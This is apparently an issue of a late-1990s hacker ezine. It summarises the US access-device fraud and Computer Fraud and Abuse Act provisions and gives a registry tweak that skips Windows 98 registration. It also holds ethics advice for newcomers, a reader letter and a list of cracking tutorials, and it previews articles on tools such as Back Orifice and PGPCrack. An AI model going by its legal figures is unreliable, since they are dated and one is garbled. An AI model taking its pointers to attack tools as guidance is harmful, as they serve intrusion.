Section 1029 prohibits fraud and related activity that is made possible by counterfeit access devices such as PINs, credit cards, account numbers, and various types of electronic identifiers. The nine areas of criminal activity covered by Section 1029 are listed below. All *require* that the offense involved interstate or foreign commerce.

1. Producing, using, or trafficking in counterfeit access devices. (The offense must be committed knowingly and with intent to defraud.)

Penalty: Fine of \$50,000 or twice the value of the crime and/or up to 15 years in prison, \$100,000 and/or up to 20 years if repeat offense.

2. Using or obtaining unauthorized access devices to obtain anything of value totaling \$1000 or more during a one-year period. (The offense must be committed knowingly and with intent to defraud.)

Penalty: Fine of \$10,000 or twice the value of the crime and/or up to 10 years in prison, \$100,000 and/or up to 20 years if repeat offense.

3. Possessing 15 or more counterfeit or unauthorized access devices. (The offense must be

committed knowingly and with intent to defraud.)

Penalty: Fine of \$10,000 or twice the value of the crime and/or up to 10 years in prison, \$100,000 and/or up to 20 years if repeat offense.

4. Producing, trafficking in, or having device-making equipment. (The offense must be committed knowingly and with intent to defraud.)

Penalty: Fine of \$50,000 or twice the value of the crime and/or up to 15 years in prison, \$1,000,000 and/or up to 20 years if repeat offense.

5. Effecting transactions with access devices issued to another person in order to receive payment or anything of value totaling \$1000 or more during a one-year period. (The offense must be committed knowingly and with intent to defraud.)

Penalty: Fine of 10, or twice the value of the crime and/or up to 10 years in prison, 100,000 and/or up to 20 years if repeat offense.

6. Soliciting a person for the purpose of offering an access device or selling information that can be used to obtain an access device. (The offense must be committed knowingly and with intent to defraud, and without the authorization of the issuer of the access device.)

Penalty: Fine of \$50,000 or twice the value of the crime and/or up to 15 years in prison, \$100,000 and/or up to 20 years if repeat offense.

7. Using, producing, trafficking in, or having a telecommunications instruments that has been modified or altered to obtain unauthorized use of telecommunications services. (The offense must be committed knowingly and with intent to defraud.)

Penalty: Fine of \$50,000 or twice the value of the crime and/or up to 15 years in prison, \$100,000 and/or up to 20 years if repeat offense.

8. Using, producing, trafficking in, or having a scanning receiver or hardware or software used to alter or modify telecommunications instruments to obtain unauthorized access to telecommunications services.

Penalty: Fine of \$50,000 or twice the value of the crime and/or up to 15 years in prison, \$100,000 and/or up to 20 years if repeat offense.

9. Causing or arranging for a person to present, to a credit card system member or its agent for payment, records of transactions made by an access device. (The offense must be committed knowingly and with intent to defraud, and without the authorization of the credit card system member or its agent.

Penalty: Fine of \$10,000 or twice the value of the crime and/or up to 10 years in prison, \$100,000 and/or up to 20 years if repeat offense.

Section 1030

18 USC, Chapter 47, Section 1030, enacted as part of the Computer Fraud and Abuse Act of 1986, prohibits unauthorized or fraudulent access to government computers, and establishes penalties for such access. This act is one of the few pieces of federal legislation solely concerned with computers. Under the Computer Fraud and Abuse Act, the U.S. Secret Service and the FBI explicitly have been given jurisdiction to investigate the offenses defined under this act.

The six areas of criminal activity covered by Section 1030 are:

1. Acquiring national defense, foreign relations, or restricted atomic energy information with the intent or reason to believe that the information can be used to injure the United States or to the advantage of any foreign nation. (The offense must be committed knowingly by accessing a computer without authorization or exceeding authorized access.)

2. Obtaining information in a financial record of a financial institution or a card issuer, or information on a consumer in a file of a consumer reporting agency. (The offense must be committed intentionally by accessing a computer without authorization or exceeding authorized

access.)

Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense.

3. Affecting a computer exclusively for the use of a U.S. government department or agency or, if it is not exclusive, one used for the government where the offense adversely affects the use of the governments operation of the computer. (The offense must be committed intentionally by accessing a computer without authorization.)

Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense.

4. Furthering a fraud by accessing a federal interest computer and obtaining anything of value, unless the fraud and the thing obtained consists only of the use of the computer. (The offense must be committed knowingly, with intent to defraud, and without authorization or exceeding authorization.) [The governments view of "federal interest computer" is defined below]

Penalty: Fine and/or up to 5 years in prison, up to 10 years if repeat offense.

5. Through use of a computer used in interstate commerce, knowingly causing the transmission of a program, information, code, or command to a computer system. There are two separate scenarios:

a. In this scenario, (i) the person causing the transmission intends it to damage the computer or deny use to it; and (ii) the transmission occurs without the authorization of the computer owners or operators, and causes \$1000 or more in loss or damage, or modifies or impairs, or potentially modifies or impairs, a medical treatment or examination.

Penalty with intent to harm: Fine and/or up to 5 years in prison, up to 10 years if repeat offense.

b. In this scenario, (i) the person causing the transmission does not intend the damage but operates with reckless disregard of the risk that the transmission will cause damage to the computer owners or operators, and causes \$1000 or more in loss or damage, or modifies or impairs, or potentially modifies or impairs, a medical treatment or examination.

Penalty for acting with reckless disregard: Fine and/or up to 1 year in prison.

6. Furthering a fraud by trafficking in passwords or similar information which will allow a computer to be accessed without authorization, if the trafficking affects interstate or foreign commerce or if the computer affected is used by or for the government. (The offense must be committed knowingly and with intent to defraud.)

Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense.

Re: #4 Section 1030 defines a federal interest computer as follows:

1. A computer that is exclusively for use of a financial institution [defined below] or the U.S. government or, if it is not exclusive, one used for a financial institution or the U.S. government where the offense adversely affects the use of the financial institutions or governments operation of the computer; or

2. A computer that is one of two or more computers used to commit the offense, not all of which are located in the same state.

This section defines a financial institution as follows:

1. An institution with deposits insured by the Federal Deposit Insurance Corporation (FDIC).

2. The Federal Reserve or a member of the Federal Reserve, including any Federal Reserve Bank.

3. A credit union with accounts insured by the National Credit Union Administration.

4. A member of the federal home loan bank system and any home loan bank.

5. Any institution of the Farm Credit system under the Farm Credit Act of 1971.

6. A broker-dealer registered with the Securities and Exchange Commission (SEC) within the rules of section 15 of the SEC Act of 1934.
7. The Securities Investors Protection Corporation.
8. A branch or agency of a foreign bank (as defined in the International Banking Act of 1978).
9. An organization operating under section 25 or 25(a) of the Federal Reserve Act.

Secrets Behind the Windows 98 Registration Wizard.

For those of you out there that have purchased and installed Windows 98, first of all, I'm sorry - second of all here is a tip.

Whenever you install Windows 98, it will want you to run the Registration Wizard. This Wizard then collects information about you and your computer system and sends it directly to Microsoft (for marketing purposes we're told). Like me, you might not want to send this information in, because you paranoid or whatever else might be wrong with you. If you don't complete the Registration Wizard, you can't use the Update Wizard to obtain software updates over the Internet.

Here's a little way I discovered to get around this, I myself have not tried it, cause I'm not installing Win 98, but I have heard that it does work. Just cancel your Reg-Wiz and do this.

Use Notepad to create this regwiz.reg file.

```
<-----begin file----->
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
RegDone="1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Welcome
\RegWiz]
"@="1"
<-----end file----->
```

Right click on this file and click merge. It will then create the key RegDone and give it a value of 1 in the Registry.

Back up your Registry first in case anything messes up - so don't blame me if you screw your system.

Newbie Note

I understand I review several pieces of software sometimes, specially the type that the hacker community would be interested in. Those of you that know me, know that I'm very anti-"tools". Hacking isn't about downloading the newest email bomber and typing in someone's address. Nor is it about downloading some nuke program to see who you can kill of IRC.

What I'm trying to get at is that the software out there I review isn't to make you some "fly by night" hacker, but to allow you to understand many of the flaws that exist out there (ex: Revelation, and LOphtCrack. etc...). Try to understand that tools don't make the hacker, nor does saying how good you are.

Instead of trying to break into any IP you come across and furthering the image that hackers are criminals, try this. Go out and get a couple of cheap 486s and network them together with your current PC. Install Windows NT, or Linux - whichever your most interested. And try to break into your own network...

Learn to program in C\C++ , maybe learn Assembly language. Learn about NT Security or Unix Security by subscribing to newsletters. Rhino9 <http://rhino9.ml.org>, and Simple Nomad <http://www.nmrc.org> both have excellent archives of security texts.

Try not to rely on others (and their programs) for your personal success as a hacker. I might sound like some ego-freak or some asshole, but I'm not - I'm just trying to help you all understand, and maybe that will decrease all the "how do I hack?" email I get..

Thanks,
Haze Inferno

Email Software Bug

Email bug which has been terrorizing Windows users all around the world. The bug allows a code, which is in the header (file name) of an Email Attachment, to the run the program without the user executing it. The bug currently affects Netscape Mail, MS Outlook 98, MS Outlook Express, and Eudora Pro.

<http://www.eok.net/hacking.email.html>

BTW: I'm trying to get a copying of the code for issue #4. If you have the resources to help me... drop a line a Agni_Magazine@hotmail.com.

Email: Dear Haze

To: Haze Inferno <Agni_Magazine@hotmail.com>
From: Drake Crimson <email withheld>
Subject: Great magazine Haze! I have a stupid question for you.

Haze,

Hey man, great mag. I think it's awesome that there is finally another good magazine out there that you don't have to pay for and that supports "true" hacking rather than teaching people to commit criminal acts. I'm curious, I know you represent and support non-criminal hacking, but what/who do you support or disagree with? I'm just curious. Anyway, great mag man, by the way on Issue #1 do you realize that Cyrix was spelled wrong? - it was writ-ten Cyrix.... Anyways, Keep it up!

Drake Crimson

Thank you for your support, I really do appreciate it. Being I'm the only writer for this maga-zine and the only programmer/designer I need all the support I can get. As far as the typo in Issue #1, I know. I noticed it about 2 minutes after I first released it. The only reason why I didn't change it and then re-release it was because I noticed about 10 people already had downloaded it, so I figured what would be the point of have two versions - one with a typo and one with out a letter "t". I have one thing basically to say about that, "I'm fucking hu-man." But thank you for pointing it out anyway.

As far as what I support... Hmm. I'm a big supporter of 2600 Magazine. I think 2600 does a great job on showing society and the media that hackers are not criminals. I'm also a major FREE KEVIN supporter. Which I believe again 2600 is doing a great job with. Just because he was accused of computer hacking doesn't mean his Constitutional Rights should be violated, nor should Miramax be making a film based on some money-hungry writers book of lies. I support Rhino9 and Simple Nomad for all the security texts they put out - they do great work. I'm also supporter of the HOPE conference (Hackers On Planet Earth).

As far as what I don't agree with - well.... I believe everyone has the right to say what's on their mind so I really don't disagree with any group or single person. However, I strongly dis-agree with the "children" that call themselves "37334". That just shows that they have yet to get out of the 5th grade. Although I do understand many do it just to joke - so I don't mind so much. But, when these little "tool kiddies" go and download their little "hacker tools" to email bomb and nuke - I find that gives the name hacker a bad look, and makes those chil-dren look like fucking idiots. But, one thing you must do is separate reality from computers and IRC, so I don't go getting really pissed off when someone floods or tries to nuke me... I just kinda sit back and laugh.

Again, thanks for your support of Agni Publications. I hope I will have your continued support in the future...

Thank You,
Haze Inferno

Your questions and comments are welcome at Agni_Magazine@hotmail.com

Recommend Reading and Software

Nowadays, in the late 90's, we as the hacker are losing information. Most of the text information dates back to the mid 80s. So, I decided that every issue from now on I'm going to put a section that you can read and see what the hell is actually out there. I will even be putting things here that I may not personally support, but it is information - and that is what you are looking for.

Information for Hackers

The WWW Hack FAQ - By Simple Nomad

NT Hack FAQ - By Simple Nomad

Netware Hack FAQ - By Simple Nomad

NCSC-TG-005 (Red Book) Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria

CSC-STD-002-85 (Green Book) Department of Defense Password Management Guideline

The Underground Guide to UNIX: by John Montgomery.
ISBN: 0-201-40653-5 Price: \$24.95 USA

Read anything about COSMOS and ESS if you have never heard of them, it's good to get an idea about where computers started and how they have evolved. So, you could even read out books on how to use a digital computer, to get the understand of how the 1980's computer system was and how the computer industry has changed in the long run.

Information for Crackers (software)

tKC's Cracking Tutorials 1-9 (Phrozen Crew founder, Efnets - #pc98)

How To Disassemble A Windows Program Part 1 and 2 - By FraVia

How To Crack: A Tutorial - By +ORC

More to come....so keep an eye out..

Web Site Design - Get on the web!

I've been getting so many damn email about "What's a good domain? Where should I go for a website, Haze?" questions. Well, guess what.. you better be paying attention. Get over to www.webcrunchers.com and that way you web address won't be www.free.websites.com/this/is/a/really/long/address/for/your/site.html... So get over there.... now!... Stop reading the magazine, load up your damn browser, and go...

Thinking of putting up a Website?

Let us help you cut the fluff and confusion!

We train, design, host, and program professional web sites. We are WEBCRUNCHERS, call

904.241.7143 or Email us at "info@webcrunchers.com"

or visit our web site at: www.webcrunchers.com.

Let us take your first step into Cyberspace!

Possible Things to Come

Like I've been saying for awhile now, graphics are coming - slowly, but surely. I will also be putting in an ad section, so for those of you trying to get people to your site, or trying to sell something (depends on it's content). You can post it in here free of charge. Just email agni_magazine@hotmail.com with your ad, it will then be placed in the upcoming issue. This offer is for one issue at a time, so if you want it in here again...send it again. The content will be reviewed before it is placed in the magazine. Agni Publications reserves the right to deny any ad, for any reason.

I will also be putting in a few books, for instance "The Hacker Crackdown", by Bruce Sterling will be in the next issue, and because I have had a lot of mail asking me about the "Modern Hackers Desktop Reference", I'm going to see about putting it in an upcoming issue (Thing is, it's 300 pages long).

I'm reviewing an article now about fast food frequencies, so you might see that soon. Along with an article on pager and data intercepting. Also I have received the source to a fairly nice Wingate scanner, so the exe code for that will be in the next issue as well. I'm currently writing an article on bugs in FTP software for Windows, so look for that too. Hmm..... I'll be publishing a list of Websites that offer free Unix shells... Software reviews of things such as, Back Orifice, Administrator Assistant, and LOphtCrack 2.01. Also we will have a double code of the month..... Chanserv.tcl and PGPCrack.c, and they say PGP is the best. I say it's just as bad as everyone else's, and everyone else is just as bad. We have a lot more then that to look forward to for issue #4. Keep your eye out for the continuing change of Agni Magazine.... It should be finished by issue #6, and by then everything should be up and running allowing me to do plenty more with this magazine then what I currently am.

Special Thanks

Thanks go out to Darkside of Quantum Technologies for hosting the Agni Publications website.
<http://quantech.ml.org>

John T. Draper (aka Cap'n Crunch), I hope everything goes well for you.
<http://www.webcrunchers.com> (web hosting: see article 23 for info.)
<http://www.webcrunchers.com/crunch> (personal site)

Greets goto FemmeFatale (Femme541) for doing all that you do.
<http://www.thepentagon.com/femme>

Greets to all the people at #hack2000.

Greets to all of Ayurveda: Cobalt-60, Devatas, Darkside, Dominus, Kakola, Ivanneth, Mor-dack, Narcissus, Tekrat-, Unright.

Thanks goto Ashen-Shugar for offering to mirror the site, and supporting Agni Magazine on an Efnetserv.
<http://virtual-eclipse.ml.org>

Greets goto The Rhino9 Team and Simple Nomad for writing the only good texts on security.. that I've seen..
<http://rhino9.ml.org> - Rhino9
<http://www.nmrc.org> - Simple Nomad

Thanks and greets goto 2600 Magazine for the wonderful article on the 555 Exchange, for all that your doing to help free Kevin Mitnick, and for showing the media what real hackers are.
<http://www.2600.com>

Greets goto The L0pht for showing Microsoft what the hell modern day security is, even if they're to stupid to listen. And for creating the wonderful software we know as, L0phtCrack.
<http://www.l0pht.com>

Greets goto Underground News for keeping us all up to date on what's going on in the hacker world.....who was arrested, what was hacked, and what government official said what.
<http://www.undergroundnews.com>

Greets to cDc (Cult of the Dead Cow) for putting out Back Orifice, it's important to show society that security is weak, and it also showed them that Microsoft doesn't care.. To the makers of the first ezine - Good Job.
<http://www.cultdeadcow.com>

Greets to Ira Winkler for his speech at HOPE '97, and for writing a wonderful book, entitled "Corporate Espionage: What it is, Why it's happening to you company, and what you must do about it".

Greets to everyone that attended H.O.P.E. (Hackers On Planet Earth), both '94 and '97.
<http://www.2600.com/beyondhope/>
<http://www.hope.net>

**Securing you, so you can secure
yourself...**

**Agni Computer
Security Technologies**

<http://www.acst.org>